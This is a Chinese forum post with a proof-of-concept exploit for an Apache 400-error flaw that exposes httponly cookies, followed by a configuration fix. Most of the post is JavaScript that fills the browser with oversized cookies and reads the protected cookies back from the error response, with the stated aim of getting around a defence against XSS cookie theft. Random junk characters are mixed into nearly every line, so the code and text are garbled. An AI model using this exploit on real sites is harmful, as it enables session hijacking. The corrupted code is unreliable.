很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
6 H( q+ p- J% z5 N7 I1 R- K
3 N# E! l- {. S用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
$ a* `9 ?6 w/ j' u' K
# @/ `# u3 q1 i7 r
3 _* M2 X5 J1 \; {7 o+ ~// http://www.exploit-db.com/exploits/18442/+ v1 b, O0 a/ Z0 p' k# S
function setCookies (good) {. O2 Q& t& q! e) n$ C% V6 x9 U
// Construct string for cookie value' b2 q2 l4 X% {9 b6 \
var str = "";
6 W% X/ U" ^) ^: J' Ffor (var i=0; i< 819; i++) {- s! ^( R2 t9 x7 _6 C6 U
str += "x";/ [ o. y# Q/ u; {$ _( L
}" M% b- V2 ]6 Z. U7 Z( |. v
// Set cookies& O6 U6 v5 N w7 e9 m+ ^& d9 @& \
for (i = 0; i < 10; i++) {
9 G1 @; M" M2 O. k- r% [, H// Expire evil cookie3 ^- K7 m( \) c$ V8 A: ~- I
if (good) {: W' a6 X3 _" S( z) x3 T
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";$ F% B* G6 z/ h3 G& Y* \* C
}
2 p4 d5 W" Z8 @0 L: q4 k// Set evil cookie2 z: ?" A8 y# S; y5 F
else {; G1 U" b( Y* g. ~* o
var cookie = "xss"+i+"="+str+";path=/";% R x) Z% }: T* \7 d
} {3 f3 t9 F0 S5 h
document.cookie = cookie;
1 g+ s1 X% ^: h3 c0 x}
( g9 |4 p+ @7 f; l) N4 Z% u}8 T! _* Z: t- \3 g S, h& b# c
function makeRequest() {
4 z; |! ?2 `) T* W: J# jsetCookies();
, e1 a( N9 j% a7 F: N. N! w. dfunction parseCookies () {
% G: {( v$ I! P4 S0 `) c2 qvar cookie_dict = {};
% ]9 ?# y6 z6 v0 r6 A- C0 F// Only react on 400 status- K9 L1 Z( W/ T5 I6 |* y
if (xhr.readyState === 4 && xhr.status === 400) {
& E* a/ j e" T// Replace newlines and match <pre> content+ F" x+ q: Q5 Z0 G
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
7 @% `. p: W2 ?* S `/ F* H& pif (content.length) {- s. a$ n; {0 ]1 m
// Remove Cookie: prefix9 R3 L9 {9 R( c0 J
content = content[1].replace("Cookie: ", "");$ C+ M) A0 X5 s2 M* y3 q3 C/ d: w
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);" X+ H! o" T* Z- T
// Add cookies to object" i7 ]% X' T0 ? l' c4 f
for (var i=0; i<cookies.length; i++) {/ M8 G2 ]1 i, U9 V' X
var s_c = cookies.split('=',2);. p" ^' z K6 L7 |* S: c0 J
cookie_dict[s_c[0]] = s_c[1];- ~" N% A/ k8 U( c. H
}
& O4 ]1 J. q( ^0 k' k" r6 k}0 \9 `( A: d, I/ [# v( W6 M( Z6 L
// Unset malicious cookies8 m2 e# E* f# |' s5 {7 G. k# j
setCookies(true);: Z; C$ @6 t) v0 N7 s* x
alert(JSON.stringify(cookie_dict));
+ O1 q% y/ S6 |4 H% {! G}1 K' W; X7 m2 R2 K; L G; J
}% }; W$ h7 y" H: b; v
// Make XHR request
( V9 c; a( G1 t+ S9 ?" F6 dvar xhr = new XMLHttpRequest();) k* n7 U5 j8 d5 v! o
xhr.onreadystatechange = parseCookies;
- _ F0 L! T( s) z* pxhr.open("GET", "/", true);2 x' Q) \3 E) W Q4 {" e9 Q
xhr.send(null);
V: j& j6 [1 o. ~4 y9 N& @}
7 C6 z5 E6 I" X: hmakeRequest();
& d' S- H( U0 c3 E: f% M' g& V1 v+ y
你就能看见华丽丽的400错误包含着cookie信息。' l! n9 a% h* o- l! c; G
8 T) f; z& _4 \& Y8 W7 p+ ]! @下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
1 r8 N0 Z0 M6 H) c' G8 H" b2 ]" c/ N1 l* r% c" \; L6 x
修复方案:; s* S7 _- u& K7 w+ E$ `
" g7 a2 J3 G ]8 v8 J; }Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下" e) B5 g' k/ T" s$ C
V7 m% H0 c1 U# N+ V1 M7 F# g' nIn the event of a problem or error, Apachecan be configured to do one of four things,
1 w0 |) |* a" |4 F# l" T2 J6 m2 I6 `0 {& \7 t0 O; Q+ h
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息) ]0 \# J0 |' p- l/ X$ d- v2 B
2. output acustomized message输出一段信息' h! n. \ ]1 b+ L7 N+ B
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 % h8 G9 N5 m, q3 ~) L5 W4 T4 h
4. redirect to an external URL to handle theproblem/error转向一个外部URL
$ z. z, r4 {/ t/ [! E: L A
3 a/ j: O0 ?. ]& N经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
' d6 z8 Y; `1 u+ c: L g
+ q. k7 B8 @5 ?) YApache配置:
+ X4 L" N0 m5 E5 d! T2 M
* s; z' Z! D5 @$ v0 p5 NErrorDocument400 " security test"
+ B! _6 V$ ~! V' X) b
3 a, k/ ?# U% s0 |9 j当然,升级apache到最新也可:)。
4 @, Y' `% {; t9 j8 y+ B6 V$ I7 h1 o. A
参考:http://httpd.apache.org/security/vulnerabilities_22.html8 w: P9 f; N. ?; i* P
3 D9 e+ s/ s/ V& z) c
|
发表于 2013-4-19 19:15:43
收藏
支持
反对